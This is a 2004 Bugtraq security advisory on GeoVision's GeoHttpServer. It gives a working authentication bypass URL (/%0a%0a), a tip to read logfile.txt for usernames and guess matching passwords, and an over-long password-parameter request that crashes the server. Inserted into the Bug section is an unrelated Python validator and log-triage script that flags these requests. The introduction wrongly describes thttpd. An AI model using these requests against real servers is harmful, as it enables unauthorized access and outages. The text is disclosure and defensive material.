GeoHttpServer Authentication Bypass Vulnerability & D.O.S (Denial Of Service)

From: Rafel Ivgi, The-Insider (theinsider_at_012.net.il)
Date: 01/22/04

    To: "bugtraq" <bugtraq@securityfocus.com>
    Date: Thu, 22 Jan 2004 19:23:16 +0200

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Software: GeoHttpServer
    Vendor: GEOVISION INC
                            http://www.geovision.com.tw
    Versions: ALL
    Platforms: Unix
    Bug: Authentication Bypass Vulnerability & D.O.S (Denial Of Service)
    Risk: High
    Exploitation: Remote with browser
    Date: 22 Jan 2004
    Author: Rafel Ivgi, The-Insider
    e-mail: the_insider@mail.com
    web: http://theinsider.deep-ice.com

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    1) Introduction
    2) Bug
    3) The Code

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ===============
    1) Introduction
    ===============

    thttpd is a free "Open Source" webserver that comes by default with Unix
    systems such as FreeBSD and Linux.

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ======
    2) Bug
    ======

    The GeoHttpServer security is pretty good. Some users, who understand what
    they are doing, configure the server to authenticate login attempts.

    The server uses this authentication code (the login form):
    **********************************************
    <html><head><title>Login In</title>
    </head><body><center>
    <form method="POST" action="phoneinfo">User Name:</BR>
      <input type="id" name="id" size="10"><p></p>
      Password:</BR>
      <input type="password" name="pwd" size="10">
      <p><input type="radio" name="ImageType" value="1" checked>JPEG&nbsp;
      <input type="radio" name="ImageType" value="2">GIF</p>
      <p><input type="submit" name="send" value="Submit"><input type="reset"
    name="CANCEL" value="Cancel"></center><center><br>
      </p>
    </form>
    </center>
    </body>
    </html>
    **********************************************

    Amazingly, requesting http://>/%0a%0a bypasses it!
    You get the GeoHttpServer default main page.

    Now the main page leads to functions that also require authentication.
    In order to retrieve a user name we can go to
    http://>/logfile.txt
    which generally contains the last logins and usernames.
    In most cases the password will be the same as the user name.

    In addition there is an authentication form inside the server that
    requires a name and a password in order to see the server info/config.
    Manipulating these links can cause a Denial of Service of the server.

    P.O.C(Proof Of Concept):
    http://>/sysinfo?id=TheInsider&pwd=killedaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaa
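    The two request shapes above, a CR/LF sequence hidden behind percent-encoding in the path and an over-long form parameter, are exactly what a server-side validator or an access-log triage pass should flag before the request reaches an authorization decision. The following Python is an added example written for this page, not GeoVision's code and not the advisory author's: the function names are hypothetical, the Common Log Format layout and the 64-byte parameter limit are assumptions, and the log lines are constructed samples.

```python
"""Added example for this page (not GeoVision's code, not the advisory
author's): a request-target validator plus a log-triage pass that flags the
two request shapes described above. All names are hypothetical and the log
lines are constructed samples."""
import re
from urllib.parse import parse_qsl, unquote

# Assumed policy limit for a single form parameter value (characters after
# decoding). The advisory's pwd value is a few hundred bytes long; 64 is an
# illustrative ceiling for a login field, not a figure from the page.
MAX_PARAM_LEN = 64

# ASCII control characters, including CR (0x0D) and LF (0x0A), plus DEL.
CONTROL_CHARS = {chr(c) for c in range(0x00, 0x20)} | {chr(0x7F)}


def check_request_target(target):
    """Return a list of findings for a raw (still percent-encoded) request target.

    1. Control characters in the decoded path. The advisory's /%0a%0a request
       only shows its problem after decoding, so decode first; a server that
       matches the encoded string against its protected-path list and decodes
       afterwards is exactly what lets an encoded LF slip past the login check.
    2. Over-long parameter values, measured after decoding so that
       %41%41... cannot stay under a limit applied to the raw query string.
    """
    findings = []
    path, _, query = target.partition("?")   # split by hand: urlsplit() strips raw CR/LF
    decoded_path = unquote(path)
    bad = sorted({c for c in decoded_path if c in CONTROL_CHARS})
    if bad:
        findings.append("control-char-in-path:" + ",".join("%%%02X" % ord(c) for c in bad))
    for name, value in parse_qsl(query, keep_blank_values=True):
        if len(value) > MAX_PARAM_LEN:
            findings.append(f"oversized-param:{name}:{len(value)}")
    return findings


# Common Log Format is assumed for the access log; adjust the pattern to
# whatever layout the real server writes.
CLF = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)


def triage_log(lines):
    """Return (client_ip, target, findings) for every log line whose request
    target trips one of the checks above; lines that do not parse are skipped."""
    hits = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue
        findings = check_request_target(m.group("target"))
        if findings:
            hits.append((m.group("ip"), m.group("target"), findings))
    return hits


# Constructed sample log: a normal login-page fetch, the encoded-LF request,
# and the over-long pwd request shaped like the advisory's P.O.C.
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Jan/2004:19:23:16 +0200] "GET /phoneinfo HTTP/1.0" 200 512',
    '192.0.2.10 - - [22/Jan/2004:19:23:40 +0200] "GET /%0a%0a HTTP/1.0" 200 2048',
    '192.0.2.10 - - [22/Jan/2004:19:24:02 +0200] "GET /sysinfo?id=TheInsider&pwd=killed'
    + "a" * 400 + ' HTTP/1.0" 500 0',
]

if __name__ == "__main__":
    for ip, target, findings in triage_log(SAMPLE_LOG):
        print(ip, target[:40], findings)
```

    The same check_request_target function can sit in front of the server's own dispatcher: rejecting a request whose decoded path contains control characters, and bounding parameter lengths before they reach whatever buffer the sysinfo handler copies them into, closes both issues at the point where the request is parsed rather than in each handler.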

    Another D.O.S caused by the server is an Internet Explorer D.O.S: when
    someone is watching a video stream from the server and presses the
    reconnect button, I.E. has an overflow.
    Internet Explorer Version: 6.0.2600.0
    Module Stuck: msxml3.dll
    Module Version: 8.20.9415.0
    Offset: 00013ed6

    http://theinsider.deep-ice.com/

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ===========
    3) The Code
    ===========

    Authentication Bypass - http://>/%0a%0a bypasses it!
    Denial Of Service -
    http://>/sysinfo?id=TheInsider&pwd=killedaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaa

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ---
    Rafel Ivgi, The-Insider
    http://theinsider.deep-ice.com
    "Things that are unlikeable, are NOT impossible."